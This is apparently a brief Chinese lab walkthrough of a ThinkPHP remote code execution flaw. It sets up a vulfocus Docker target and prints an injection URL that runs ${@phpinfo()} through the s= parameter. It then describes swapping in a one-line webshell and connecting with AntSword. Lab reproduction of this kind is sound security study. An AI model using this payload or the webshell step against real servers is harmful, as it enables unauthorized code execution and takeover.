thinkphp框架远程代码执行

一、环境

vulfocus网上自行下载

启动命令:

 docker run -d --privileged -p 8081:80 -v /var/run/docker.sock:/var/run/docker.sock -e VUL_IP=192.168.131.144  8e55f85571c8

一定添加--privileged不然只能拉取环境首页不显示

二、thinkphp远程代码执行

首页:

先开始资产收集:

端口:

目录:

网上搜索历史cve

输入pyload

http://192.168.131.144:29319/index.php?s=/index/index/name/${@phpinfo()})

命令执行

使用bp抓包

替换成一句话木马

使用蚁剑去连接

相关推荐
无泡汽水3 小时前
漏洞检测工具:Swagger UI敏感信息泄露
python·web安全
WTT00119 小时前
2024楚慧杯WP
大数据·运维·网络·安全·web安全·ctf
黑客Jack13 小时前
防御 XSS 的七条原则
安全·web安全·xss
东方隐侠安全团队-千里13 小时前
网安瞭望台第17期:Rockstar 2FA 故障催生 FlowerStorm 钓鱼即服务扩张现象剖析
网络·chrome·web安全
Mitch31115 小时前
【漏洞复现】CVE-2021-45788 SQL Injection
sql·web安全·docker·prometheus·metersphere
网络安全King15 小时前
网络安全 - SQL Injection
sql·web安全·php
m0_7482370517 小时前
2024年“羊城杯”粤港澳大湾区网络安全大赛 初赛 Web&数据安全&AI 题解WriteUp
前端·安全·web安全
hwscom17 小时前
如何永久解决Apache Struts文件上传漏洞
java·服务器·struts·web安全·apache
网络安全(华哥)17 小时前
X-Forwarded-For注入漏洞
windows·安全·web安全